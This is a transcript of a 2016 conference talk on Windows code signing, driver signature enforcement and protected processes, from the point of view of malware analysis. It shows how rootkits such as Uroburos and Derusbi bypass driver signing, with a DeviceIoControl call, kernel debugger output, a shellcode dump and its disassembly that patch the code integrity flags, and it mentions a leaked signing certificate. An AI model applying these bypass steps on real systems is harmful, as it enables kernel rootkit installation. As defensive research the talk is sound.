Windows Systems & Code Signing Protection by Paul Rascagneres

Windows systems & code signing

protection

Shakacon – 13-14 July 2016 – Paul Rascagnères - SEKOIA

Windows systems & code signing protection | About me

2

Paul Rascagnères

Member of the CERT SEKOIA

Malware analysis

Incident Response

Security researcher

Yo-yo player

Offices in Luxembourg & Paris

Located in Luxembourg


Windows systems & code signing protection | About me

3

Due to questions yesterday:

Geography slide about Luxembourg

Area: 998 sq mi - 2,586 km2

Population: 576,249


Authenticode

4


Windows systems & code signing protection | Authenticode

5

The code signing mechanism provided by

Microsoft is named Authenticode

Based on certificate

Support expiration date and Microsoft

manages a revocation list (for example if a

certificate is compromised)



6

For the kernel mode, the driver signature is

mandatory since Windows 7 – 64 bits

For the user mode, the binary signature is not

mandatory. “As a software publisher, there are

two reasons to sign your code: to prove its

Integrity and to develop its Reputation”1.

1. https://blogs.msdn.microsoft.com/ieinternals/2011/03/22/everything-you-need-to-know-about-authenticode-code-signing/



7


Kernel space implications

8


Windows systems & code signing protection | Kernel

9

For the kernel mode, the driver signature is


Is it the end of rootkit?



10

For the kernel space, the driver signature is


Is it the end of rootkit?



11

I identified 2 ways used by rootkit developers

to bypass this protection:

a “low cost” approach

a “high end” approach



12

“low cost”

For developing reason, Microsoft provides a

test mode on Windows systems. A reboot is

required to enable this mode bcdedit.exe -set TESTSIGNING ON



13

“low cost”

For developing reason, Microsoft provides a

test mode on Windows systems. A reboot is

required to enable this mode bcdedit.exe -set TESTSIGNING ON

The message is shown by winlogon.exe

(and attackers patch it, 1 test to alter)



14

“high end”: Uroburos technique

The malware developers used a vulnerability

to disable the driver signature

CVE-2008-3431:

http://www.coresecurity.com/content/virtualb

ox-privilege-escalation-vulnerability Vulnerability in VBoxDrv.sys that allows to

switch an arbitrary kernel memory address to

0.

http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability



15


The overwritten address was g_CiEnabled

(Ci is for Code Integrity)

Before: kd> dq nt!g_cienabled ->

fffff800`02e45eb8 00000001

After: kd> dq nt!g_cienabled ->

fffff800`02e45eb8 00000000



16


The effect is to “switch” to test mode without

rebooting, without the message on the

desktop… but with the ability to use the bcdedit.exe command to identify that the

machine is in test mode ;)



17


the malware opens the VBoxDrv symlink;

it loads ntoskrnl.exe;

it locates g_CiEnabled;

it uses DeviceIoControl() to switch

arbitrary address to 0

DeviceIoControl(VBoxDrv, SUP_IOCTL_FAST_DO_NOP,

g_CiEnabledAddr, 0, g_CiEnabledAddr, 0, &cb, NULL)

Complete implementation there; http://www.kernelmode.info/forum/viewtopic.php?t=3322&f=11

http://www.kernelmode.info/forum/viewtopic.php?t=3322&f=11



18

“high end”: Derusbi technique

The malware developers used a vulnerability

to disable the driver signature

CVE-2013-3956:

https://www.novell.com/support/kb/doc.php?i

d=7012497 Vulnerability in NICM.SYS that allows code

execution in kernel space.

https://www.novell.com/support/kb/doc.php?id=7012497



19


Analysis of the shellcode used during the

exploitation0:001> g

[...]

String(24,24) at 0000000002c9d230: \Device\Nicm

00000000`02c9d250 00000140

Breakpoint 6 hit

kernel32!DeviceIoControl:

00000000`76e067b4 ff25ce6e0800 jmp qword ptr [kernel32!_imp_DeviceIoControl

(00000000`76e8d688)] ds:00000000`76e8d688={KERNELBASE!DeviceIoControl

(000007fe`fda8a1e0)}

0:001> db @r8

00000000`0d0d0000 28 00 0d 0d 00 00 00 00-ff eb 45 00 ff ff ff ff (.........E.....

00000000`0d0d0010 08 20 ef 16 f9 33 8e 06-e5 44 0d 0e c2 72 0a 5e . ...3...D...r.^

00000000`0d0d0020 2c 02 44 0d 33 49 ae 72-30 00 0d 0d 00 00 00 00 ,.D.3I.r0.......

00000000`0d0d0030 9a 3f 2f 19 0f 36 81 62-25 14 bf 59 13 3b 9f 7b .?/..6.b%..Y.;.{

00000000`0d0d0040 8d 5b 7f 29 29 3f 98 65-86 bc a2 02 00 f8 ff ff .[.))?.e........

00000000`0d0d0050 48 b8 30 0e e8 00 80 f8-ff ff 8b 18 80 cb 08 89 H.0.............

00000000`0d0d0060 18 c3 cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................

00000000`0d0d0070 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................



20



exploitation$rasm2 -k windows -b 64 -a x86.udis -D "48b8300ee80080f8ffff8b1880cb088918c3"

0x00000000 10 48b8300ee80080f8ffff mov rax, 0xfffff88000e80e30

0x0000000a 2 8b18 mov ebx, [rax]

0x0000000c 3 80cb08 or bl, 0x8

0x0000000f 2 8918 mov [rax], ebx

0x00000011 1 c3 ret

kd> !address 0xfffff88000e80e30

[…]

Usage: Module

Base Address: fffff880`00e7b000

End Address: fffff880`00f3b000

Region Size: 00000000`000c0000

VA Type: SystemPTEs

Module name: CI.dll

Module path: [\SystemRoot\system32\CI.dll]



21



exploitation Before: kd> dd 0xfffff88000e80e30 L1

fffff880`00e80e30 00000006

After: kd> dd 0xfffff88000e80e30 L1

fffff880`00e80e30 0000000e



22



exploitation

Why this value? Let’s check CI.dll



23


Mateusz ‘j00ru’ Jurczyk post2

01. VOID SepInitializeCodeIntegrity()

02. {

03. DWORD CiOptions;

04. g_CiEnabled = FALSE;

05. if(!InitIsWinPEMode)

06. g_CiEnabled = TRUE;

07.

08. memset(g_CiCallbacks,0,3*sizeof(SIZE_T));

09. CiOptions = 4|2; //0x6 by default

10.

11. if(KeLoaderBlock)

12. {

13. if(*(DWORD*)(KeLoaderBlock+84))

14. {

15. if(SepIsOptionPresent((KeLoaderBlock+84),L"DISABLE_INTEGRITY_CHECKS"))

16. CiOptions = 0;

17. if(SepIsOptionPresent((KeLoaderBlock+84),L"TESTSIGNING"))

18. CiOptions |= 8; //4 or 2 or 8 == 0xe

19. }

20. CiInitialize(CiOptions,(KeLoaderBlock+32),&g_CiCallbacks);

21. }

22. }

2. https://blogs.msdn.microsoft.com/ieinternals/2011/03/22/everything-you-need-to-know-about-authenticode-code-signing/



24


Let’s check CI.dll

0xfffff88000e80e30 == dword_7FF404C5E30

This variable contains the CiOptions flags



25


The effect is to “switch” to test mode without

rebooting, without the message on the desktop and the bcdedit.exe command

shows that the machine is not in test mode

because the global flag was not modified…



26

“high end”: GrayFish (Equation Group)

technique

Sadly I don’t have the samples :’(

Kaspersky report:

https://securelist.com/files/2015/02/Equation

_group_questions_and_answers.pdf

“To bypass modern OS security mechanisms that block the

execution of untrusted code in kernel mode, GrayFish

exploits several legitimate drivers, including one from the

CloneCD program. This driver ( ElbyCDIO.sys ) contains a

vulnerability which GrayFish exploits to achieve kernel-level

code execution”

https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf



27


technique

CVE-2009-0824 Code execution in ElbyCDIO.sys

(CloneCD)

But no samples hashes in the publication :’(

So I asked & Kaspersky accepted to share

the samples with me…



28


technique

CVE-2009-0824 Code execution in ElbyCDIO.sys

(CloneCD)

But no samples hashes in the publication :’(

So I asked & Kaspersky accepted to share

the samples with me…

BUT



29


technique

Kaspersky promised to provide me the

sample in March…



30


technique


sample in March… in April



31


technique


sample in March… in April… in May



32


technique


sample in March… in April… in May …

in June



33


technique



in June … and in July…



34


technique



in June … and in July…

I’m still waiting :’(



35

“high end”: HIDEDRV (APT28/Fancy

Bear/Sednit/…) technique

I only have the 64 bits .sys file…

No dropper :’(

So I don’t know how the attacker bypass the

authenticode :’(

If someone in the room have this dropper, do

not hesitate to contact me!!!



36

“high end”: the same approach

The malware developers use the same

approach with different implementation:

vulnerability exploitation on legitimate driver.



37


What about the expiration date?

In kernel space, we can perfectly load an

driver signed by an expired certificate…



38


What about the revocation of certificate?

Who really cares of CRL?

The certificate of the vulnerable drivers

mentioned today are not yet revoked…

It seems to be complicated to

systematically revoke certificates once a

vulnerability is found. (huge side effects)

I’m not even sure that CRL works for

Kernel space…



39

Extra trick

The Atheros private certificate leak

https://duo.com/assets/pdf/Dude,_You_Got_

Dell_d.pdf

https://duo.com/assets/pdf/Dude,_You_Got_Dell_d.pdf



40

Extra trick



41

Extra trick

The Atheros private certificate can be used

to sign a driver - even if the cert is expired -

On a fresh default Windows install, the driver

can perfectly be loaded - even if the cert is

expired -



42

The future?

“Microsoft announced that Windows 10 would not allow installation of

drivers unless the driver was signed via the SysDev portal (that is, signed

by Microsoft, thought this will not require the driver to pass the HLK tests.”

source “The NT Insider May-June 2016”

Not implemented for Windows 10 RS2 Preview…


User space (new) implications

in Windows 10 TH2

43


Windows systems & code signing protection | User Space

44

The protected processes

Microsoft implemented a Signing Level in

Windows 8.

Alex Ionescu perfectly documented this code

signing feature: http://www.alex-

ionescu.com/?p=146

http://www.alex-ionescu.com/?p=146



45




46


No more PROCESS_ALL_ACCESS, PROCESS_CREATE_PROCESS, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE,

PROCESS_QUERY_INFORMATION, PROCESS_SET_INFORMATION,

PROCESS_SET_QUOTA, PROCESS_VM_OPERATION, PROCESS_VM_READ,

PROCESS_VM_WRITE

Welcome PROCESS_QUERY_LIMITED_INFORMATION

Only available for Microsoft binaries… you cannot create your own protected process :’(



47

“Protecting Microsoft Edge against binary

injection”

Communication by Microsoft:

https://blogs.windows.com/msedgedev/2015/

11/17/microsoft-edge-module-code-integrity/

“The latest Windows 10 updates strengthen

Microsoft Edge with industry-leading

enforcement against loading unauthorized

DLLs into Microsoft Edge content

processes.” (latest == TH2)

https://blogs.windows.com/msedgedev/2015/11/17/microsoft-edge-module-code-integrity/



48


injection”

Documented

VS

Undocumented



49


injection”

Mitigation Policytypedef enum _PROCESS_MITIGATION_POLICY {

ProcessDEPPolicy,

ProcessASLRPolicy,

ProcessDynamicCodePolicy,

ProcessStrictHandleCheckPolicy,

ProcessSystemCallDisablePolicy,

ProcessMitigationOptionsMask,

ProcessExtensionPointDisablePolicy,

ProcessControlFlowGuardPolicy,

ProcessSignaturePolicy,

ProcessFontDisablePolicy,

ProcessImageLoadPolicy,

MaxProcessMitigationPolicy

} PROCESS_MITIGATION_POLICY, *PPROCESS_MITIGATION_POLICY;



50


injection”

Mitigation Policytypedef struct _PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY {

union {

DWORD Flags;

struct {

DWORD MicrosoftSignedOnly : 1;

DWORD StoreSignedOnly : 1;

DWORD MitigationOptIn : 1;

DWORD ReservedFlags : 29;

} DUMMYSTRUCTNAME;

} DUMMYUNIONNAME;

} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY,

*PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY;



51


injection”

How does it work? During a LoadLibrary() API call

-> the kernel calls NtCreateSection();

-> MiCreateSection() is called;

-> MiValidateSectionCreate() is called;-> ci.dll (Code Integrity) is used in

order to check signatures



52


injection”

Is it bulletproof?



53


injection”

Does it bulletproof?

For proper .dll injection via LoadLibrary(): YES

For dirty injection (shellcode injection, in

memory patching, …): NO

Code test:

https://github.com/SekoiaLab/BinaryInjectionMitigation/

https://github.com/SekoiaLab/BinaryInjectionMitigation/


Questions?

or awkward silence?

or applause to wake up your neighbour?

54

Windows Systems & Code Signing Protection by Paul Rascagneres

Technology

Transcript of Windows Systems & Code Signing Protection by Paul Rascagneres